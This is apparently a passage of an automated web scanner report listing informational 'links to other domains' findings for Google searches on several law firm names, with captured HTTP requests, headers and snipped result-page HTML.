<h3 class="r"><a href="http://www.facebook.com/pages/Poyner-Spruill-LLP/90172198645" class=l onmousedown="return clk(this.href,'','','','5','','0CEAQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:hzM3mOU6eIsJ:www.facebook.com/pages/Poyner-Spruill-LLP/90172198645+Poyner+Spruill&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CEUQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://twitter.com/poynerspruill" class=l onmousedown="return clk(this.href,'','','','6','','0CEcQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:-WY7QXxhiGIJ:twitter.com/poynerspruill+Poyner+Spruill&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CEwQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.martindale.com/Poyner-Spruill-LLP/1407863-law-firm-office.htm" class=l onmousedown="return clk(this.href,'','','','7','','0CE4QFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ezllY4TGCK8J:www.martindale.com/Poyner-Spruill-LLP/1407863-law-firm-office.htm+Poyner+Spruill&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CFMQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.natlawreview.com/organization/poyner-spruill-llp" class=l onmousedown="return clk(this.href,'','','','8','','0CFYQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:DeZTBmXK594J:www.natlawreview.com/organization/poyner-spruill-llp+Poyner+Spruill&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CFsQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.linkedin.com/company/poyner-spruill-llp" class=l onmousedown="return clk(this.href,'','','','9','','0CF0QFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:GGkybNkDh-MJ:www.linkedin.com/company/poyner-spruill-llp+Poyner+Spruill&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CGIQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.bizjournals.com/charlotte/print-edition/2011/03/25/40-under-40-court-young.html" class=l onmousedown="return clk(this.href,'','','','10','','0CGQQFjAJ')">40 Under 40: Court Young, <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:-jTza2-aOg8J:www.bizjournals.com/charlotte/print-edition/2011/03/25/40-under-40-court-young.html+Poyner+Spruill&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CGkQIDAJ')">Cached</a>
...[SNIP]...
<div><a href="http://www.smithlaw.com/" class=l onmousedown="return clk(this.href,'','','','11','','0CGsQoggwCg')">Smith Anderson</a>
...[SNIP]...
<div><a href="http://www.tharringtonsmith.com/" class=l onmousedown="return clk(this.href,'','','','12','','0CG0QoggwCw')">Tharrington Smith LLP</a>
...[SNIP]...
<div><a href="http://www.brookspierce.com/" class=l onmousedown="return clk(this.href,'','','','13','','0CG8QoggwDA')">Brooks Pierce</a>
...[SNIP]...
<div><a href="http://www.wyrick.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CHEQoggwDQ')">Wyrick Robbins Yates & Ponton LLP</a>
...[SNIP]...
24.12. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=Wiggin+and+Dana&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=MZ67J2sMk2-iutK_j-M5kw_OU3QwEqLvmD3FPQ_AsjnltT7UerAb1HjiSijLELzg8YEwu50i5Tjttnu8jq1EP7Tjw2-1bm8QN0ooAhBiMftqXzqms7RFfZAGQXTL5FgE

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:01:50 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 76500

<!doctype html> <head> <title>Wiggin and Dana - Google Search</title> <script>window.google={kEI:"bgTMTcqWOObg0QGfrvjFBg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,28505,29229,29685,2979
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Wiggin+and+Dana&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.wiggin.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBwQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:pfv3ZbRBd7sJ:www.wiggin.com/+Wiggin+and+Dana&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CCEQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.wiggin.com/bios.aspx" onmousedown="return clk(this.href,'','','','1','','0CCMQqwMoADAA')">Attorneys</a></div><div class=sld><a class=sla href="http://www.wiggin.com/bios.aspx?SortBy=Office" onmousedown="return clk(this.href,'','','','1','','0CCQQqwMoATAA')">By Office</a></div><div class=sld><a class=sla href="http://www.wiggin.com/careers.aspx" onmousedown="return clk(this.href,'','','','1','','0CCUQqwMoAjAA')">Careers</a></div><div class=sld><a class=sla href="http://www.wiggin.com/showoffice.aspx?show=141" onmousedown="return clk(this.href,'','','','1','','0CCYQqwMoAzAA')">New Haven</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.wiggin.com/contact.aspx" onmousedown="return clk(this.href,'','','','1','','0CCcQqwMoBDAA')">Contact</a></div><div class=sld><a class=sla href="http://www.wiggin.com/bios.aspx?SortBy=Practice" onmousedown="return clk(this.href,'','','','1','','0CCgQqwMoBTAA')">By Practice</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.wiggin.com/showoffice.aspx?show=143" onmousedown="return clk(this.href,'','','','1','','0CCkQqwMoBjAA')">Stamford</a></div><div class=sld><a class=sla href="http://www.wiggin.com/careers.aspx?Type=11056" onmousedown="return clk(this.href,'','','','1','','0CCoQqwMoBzAA')">Lateral Lawyers</a>
...[SNIP]...
<span valign=top align=left style="padding:10;margin:0;width:24px;height:38px"><a href="http://www.wiggin.com/" class=l onmousedown="return clk(this.href,'','','','2','','0CC0QoAIwAQ')" title="Wiggin &amp;amp; Dana" style="border:none;display:block;overflow:hidden;width:24px;height:38px"><span style="background:url('/images/red_icons_bg_A_J.png') no-repeat;background-position:0 0;display:block;height:38px;width:24px">
...[SNIP]...
<h4 class=r><a href="http://www.wiggin.com/" class=l onmousedown="return clk(this.href,'','','','2','','0CC0QoAIwAQ')" title="Wiggin &amp;amp; Dana"><em>
...[SNIP]...
<span valign=top align=left style="padding:10;margin:0;width:24px;height:38px"><a href="http://www.wiggin.com/" class=l onmousedown="return clk(this.href,'','','','3','','0CDQQoAIwAg')" title="Wiggin &amp;amp; Dana" style="border:none;display:block;overflow:hidden;width:24px;height:38px"><span style="background:url('/images/red_icons_bg_A_J.png') no-repeat;background-position:0 -38px;display:block;height:38px;width:24px">
...[SNIP]...
<h4 class=r><a href="http://www.wiggin.com/" class=l onmousedown="return clk(this.href,'','','','3','','0CDQQoAIwAg')" title="Wiggin &amp;amp; Dana"><em>
...[SNIP]...
<span valign=top align=left style="padding:10;margin:0;width:24px;height:38px"><a href="http://www.wiggin.com/" class=l onmousedown="return clk(this.href,'','','','4','','0CDsQoAIwAw')" title="Wiggin &amp;amp; Dana" style="border:none;display:block;overflow:hidden;width:24px;height:38px"><span style="background:url('/images/red_icons_bg_A_J.png') no-repeat;background-position:0 -76px;display:block;height:38px;width:24px">
...[SNIP]...
<h4 class=r><a href="http://www.wiggin.com/" class=l onmousedown="return clk(this.href,'','','','4','','0CDsQoAIwAw')" title="Wiggin &amp;amp; Dana"><em>
...[SNIP]...
<h3 class="r"><a href="http://www.wiggin.com/bios.aspx" class=l onmousedown="return clk(this.href,'','','','5','','0CEYQFjAE')">Attorneys - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:4HRE5VmOdQcJ:www.wiggin.com/bios.aspx+Wiggin+and+Dana&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CEsQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.wiggin.com/bios.aspx?SortBy=Office" class=l onmousedown="return clk(this.href,'','','','6','','0CE0QFjAF')">By Office - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:rnGRwt0GGkwJ:www.wiggin.com/bios.aspx%3FSortBy%3DOffice+Wiggin+and+Dana&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:rnGRwt0GGkwJ:www.wiggin.com/bios.aspx%3FSortBy%3DOffice+Wiggin+and+Dana&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','6','','0CFIQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.wiggin.com/showoffice.aspx?show=141" class=l onmousedown="return clk(this.href,'','','','7','','0CFQQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:IKt6E0hI61IJ:www.wiggin.com/showoffice.aspx%3Fshow%3D141+Wiggin+and+Dana&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:IKt6E0hI61IJ:www.wiggin.com/showoffice.aspx%3Fshow%3D141+Wiggin+and+Dana&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','7','','0CFkQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.law.com/jsp/article.jsp?id=1202428898101" class=l onmousedown="return clk(this.href,'','','','8','','0CFwQFjAH')">Law.com - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:X2RhUt9yO80J:www.law.com/jsp/article.jsp%3Fid%3D1202428898101+Wiggin+and+Dana&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:X2RhUt9yO80J:www.law.com/jsp/article.jsp%3Fid%3D1202428898101+Wiggin+and+Dana&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','8','','0CGEQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://abovethelaw.com/2009/03/nationwide-layoff-watch-wiggin-dana-proves-theres-nowhere-to-run/" class=l onmousedown="return clk(this.href,'','','','9','','0CGMQFjAI')">Nationwide Layoff Watch: <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:i5Ve4513YqkJ:abovethelaw.com/2009/03/nationwide-layoff-watch-wiggin-dana-proves-theres-nowhere-to-run/+Wiggin+and+Dana&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CGgQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.newhaven.edu/academics/16367/16377" class=l onmousedown="return clk(this.href,'','','','10','','0CGkQFjAJ')">University of New Haven : <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:_1obzXUw3pAJ:www.newhaven.edu/academics/16367/16377+Wiggin+and+Dana&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CG4QIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://newhavenindependent.org/archives/2009/03/wiggin_dana_sla.php" class=l onmousedown="return clk(this.href,'','','','11','','0CG8QFjAK')"><em>
...[SNIP]...
<h3 class="r"><a href="http://www.linkedin.com/company/wiggin-and-dana-llp" class=l onmousedown="return clk(this.href,'','','','12','','0CHIQFjAL')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:R7nrlRyeztsJ:www.linkedin.com/company/wiggin-and-dana-llp+Wiggin+and+Dana&amp;cd=12&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','12','','0CHcQIDAL')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://pview.findlaw.com/view/2634679_1" class=l onmousedown="return clk(this.href,'','','','13','','0CHgQFjAM')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:P0mFoc5Va_kJ:pview.findlaw.com/view/2634679_1+Wiggin+and+Dana&amp;cd=13&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','13','','0CH0QIDAM')">Cached</a>
...[SNIP]...
<div><a href="http://www.uks.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CH8QoggwDQ')">Updike, Kelly & Spellacy</a>
...[SNIP]...
<div><a href="http://www.shipmangoodwin.com/" class=l onmousedown="return clk(this.href,'','','','15','','0CIEBEKIIMA4')">Shipman & Goodwin LLP</a>
...[SNIP]...
<div><a href="http://www.rc.com/" class=l onmousedown="return clk(this.href,'','','','16','','0CIMBEKIIMA8')">Robinson & Cole</a>
...[SNIP]...
<div><a href="http://www.murthalaw.com/" class=l onmousedown="return clk(this.href,'','','','17','','0CIUBEKIIMBA')">Murtha Cullina</a>
...[SNIP]...
24.13. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=Sheehan+Phinney&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=MZ67J2sMk2-iutK_j-M5kw_OU3QwEqLvmD3FPQ_AsjnltT7UerAb1HjiSijLELzg8YEwu50i5Tjttnu8jq1EP7Tjw2-1bm8QN0ooAhBiMftqXzqms7RFfZAGQXTL5FgE

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:02:11 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 71529

<!doctype html> <head> <title>Sheehan Phinney - Google Search</title> <script>window.google={kEI:"gwTMTfa6CMu70QG3nvjfBg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,28505,29229,29685,2979
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Sheehan+Phinney&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.sheehan.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBsQFjAA')">Attorneys at Law : <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:q7qS35qkxLAJ:www.sheehan.com/+Sheehan+Phinney&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CCAQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.sheehan.com/contact-us/locations-directions/manchester.aspx" onmousedown="return clk(this.href,'','','','1','','0CCIQqwMoADAA')">Manchester</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.sheehan.com/contact-us/locations-directions/boston.aspx" onmousedown="return clk(this.href,'','','','1','','0CCMQqwMoATAA')">Boston</a></div><div class=sld><a class=sla href="http://www.sheehan.com/contact-us/locations-directions/concord.aspx" onmousedown="return clk(this.href,'','','','1','','0CCQQqwMoAjAA')">Concord</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.sheehan.com/contact-us/locations-directions/hanover.aspx" onmousedown="return clk(this.href,'','','','1','','0CCUQqwMoAzAA')">Hanover</a></div><div class=sld><a class=sla href="http://www.sheehan.com/events/event-list.aspx" onmousedown="return clk(this.href,'','','','1','','0CCYQqwMoBDAA')">Calendar</a>
...[SNIP]...
<h3 class="r"><a href="http://www.sheehan.com/contact-us/locations-directions/manchester.aspx" class=l onmousedown="return clk(this.href,'','','','2','','0CCkQFjAB')">Contact Us - Office Locations - Manchester</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:9NILVI9j9MoJ:www.sheehan.com/contact-us/locations-directions/manchester.aspx+Sheehan+Phinney&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CC4QIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.sheehan.com/contact-us/locations-directions/boston.aspx" class=l onmousedown="return clk(this.href,'','','','3','','0CDAQFjAC')">Law Firm Office Directions : <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Vw02XD7BDd4J:www.sheehan.com/contact-us/locations-directions/boston.aspx+Sheehan+Phinney&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CDUQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.sheehan.com/news/articles/Sheehan-Phinney-Named-2007-Business-of-the-Year--Business-Services-Industry_255.aspx" class=l onmousedown="return clk(this.href,'','','','4','','0CDcQFjAD')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:2wU8PD727JwJ:www.sheehan.com/news/articles/Sheehan-Phinney-Named-2007-Business-of-the-Year--Business-Services-Industry_255.aspx+Sheehan+Phinney&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CDwQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.martindale.com/Sheehan-Phinney-Bass-+-Green-Professional/1075514-law-firm-office.htm" class=l onmousedown="return clk(this.href,'','','','5','','0CD8QFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:AnNQ0FPfy2sJ:www.martindale.com/Sheehan-Phinney-Bass-%2B-Green-Professional/1075514-law-firm-office.htm+Sheehan+Phinney&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:AnNQ0FPfy2sJ:www.martindale.com/Sheehan-Phinney-Bass-%2B-Green-Professional/1075514-law-firm-office.htm+Sheehan+Phinney&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','5','','0CEQQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.lawyers.com/New-Hampshire/Manchester/Sheehan-Phinney-Bass--Green,-Professional-Association-1075514-f.html" class=l onmousedown="return clk(this.href,'','','','6','','0CEYQFjAF')"><em>
...[SNIP]...
<h3 class="r"><a href="http://national.citysearch.com/profile/32395173/manchester_nh/sheehan_phinney_tax_group.html" class=l onmousedown="return clk(this.href,'','','','7','','0CE4QFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:FvFoxQlXmtEJ:national.citysearch.com/profile/32395173/manchester_nh/sheehan_phinney_tax_group.html+Sheehan+Phinney&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CFYQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.linkedin.com/company/sheehan-phinney-bass-+-green-pa" class=l onmousedown="return clk(this.href,'','','','8','','0CFcQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:cqYiUEhP7mMJ:www.linkedin.com/company/sheehan-phinney-bass-%2B-green-pa+Sheehan+Phinney&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:cqYiUEhP7mMJ:www.linkedin.com/company/sheehan-phinney-bass-%2B-green-pa+Sheehan+Phinney&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','8','','0CFwQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://jobsearch.monster.com/Sheehan-Phinney-Bass-__2b-Green_6" class=l onmousedown="return clk(this.href,'','','','9','','0CF0QFjAI')">Jobs &amp; Careers at <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:FIJkqAjhGM0J:jobsearch.monster.com/Sheehan-Phinney-Bass-__2b-Green_6+Sheehan+Phinney&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CGIQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://investing.businessweek.com/research/stocks/private/snapshot.asp?privcapId=2410322" class=l onmousedown="return clk(this.href,'','','','10','','0CGMQFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:DUUd_Z9znwsJ:investing.businessweek.com/research/stocks/private/snapshot.asp%3FprivcapId%3D2410322+Sheehan+Phinney&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:DUUd_Z9znwsJ:investing.businessweek.com/research/stocks/private/snapshot.asp%3FprivcapId%3D2410322+Sheehan+Phinney&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','10','','0CGgQIDAJ')">Cached</a>
...[SNIP]...
<div><a href="http://www.mclane.com/" class=l onmousedown="return clk(this.href,'','','','11','','0CGoQoggwCg')">McLane, Graf, Raulerson & Middleton</a>
...[SNIP]...
<div><a href="http://www.orr-reno.com/" class=l onmousedown="return clk(this.href,'','','','12','','0CGwQoggwCw')">Orr & Reno, Professional Association</a>
...[SNIP]...
<div><a href="http://www.shaheengordon.com/" class=l onmousedown="return clk(this.href,'','','','13','','0CG4QoggwDA')">Shaheen & Gordon, P.A.</a>
...[SNIP]...
<div><a href="http://www.gcglaw.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CHAQoggwDQ')">Gallagher, Callahan & Gartrell</a>
...[SNIP]...
24.14. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=Milbank+Tweed+Hadley+%26+McCloy&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=MZ67J2sMk2-iutK_j-M5kw_OU3QwEqLvmD3FPQ_AsjnltT7UerAb1HjiSijLELzg8YEwu50i5Tjttnu8jq1EP7Tjw2-1bm8QN0ooAhBiMftqXzqms7RFfZAGQXTL5FgE

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:08:24 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 76531

<!doctype html> <head> <title>Milbank Tweed Hadley &amp; McCloy - Google Search</title> <script>window.google={kEI:"-AXMTdy5I6jn0QGQ5qD1Bg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,2850
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Milbank+Tweed+Hadley+%26+McCloy&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.milbank.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CCAQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:xf6fmcDneakJ:www.milbank.com/+Milbank+Tweed+Hadley+%26+McCloy&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:xf6fmcDneakJ:www.milbank.com/+Milbank+Tweed+Hadley+%26+McCloy&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','1','','0CCUQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.milbank.com/en/Attorneys/" onmousedown="return clk(this.href,'','','','1','','0CCcQqwMoADAA')">Attorneys</a></div><div class=sld><a class=sla href="http://www.milbank.com/en/Offices/" onmousedown="return clk(this.href,'','','','1','','0CCgQqwMoATAA')">Offices</a></div><div class=sld><a class=sla href="http://www.milbank.com/careers/" onmousedown="return clk(this.href,'','','','1','','0CCkQqwMoAjAA')">Careers at Milbank</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.milbank.com/en/Contactus/" onmousedown="return clk(this.href,'','','','1','','0CCoQqwMoAzAA')">Contact Us</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.milbank.com/en/PracticeAreas/" onmousedown="return clk(this.href,'','','','1','','0CCsQqwMoBDAA')">Practice areas</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.milbank.com/en/NewsEvents/" onmousedown="return clk(this.href,'','','','1','','0CCwQqwMoBTAA')">Newsroom / events</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.milbank.com/en/AboutUsHistory/" onmousedown="return clk(this.href,'','','','1','','0CC0QqwMoBjAA')">About us / history</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.milbank.com/careers/awards.html" onmousedown="return clk(this.href,'','','','1','','0CC4QqwMoBzAA')">Awards &amp; rankings</a>
...[SNIP]...
<h3 class="r"><a href="http://www.milbank.com/en/Attorneys/" class=l onmousedown="return clk(this.href,'','','','2','','0CDEQFjAB')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:UINrGxJEQwAJ:www.milbank.com/en/Attorneys/+Milbank+Tweed+Hadley+%26+McCloy&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:UINrGxJEQwAJ:www.milbank.com/en/Attorneys/+Milbank+Tweed+Hadley+%26+McCloy&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','2','','0CDYQIDAB')">Cached</a>
...[SNIP]...
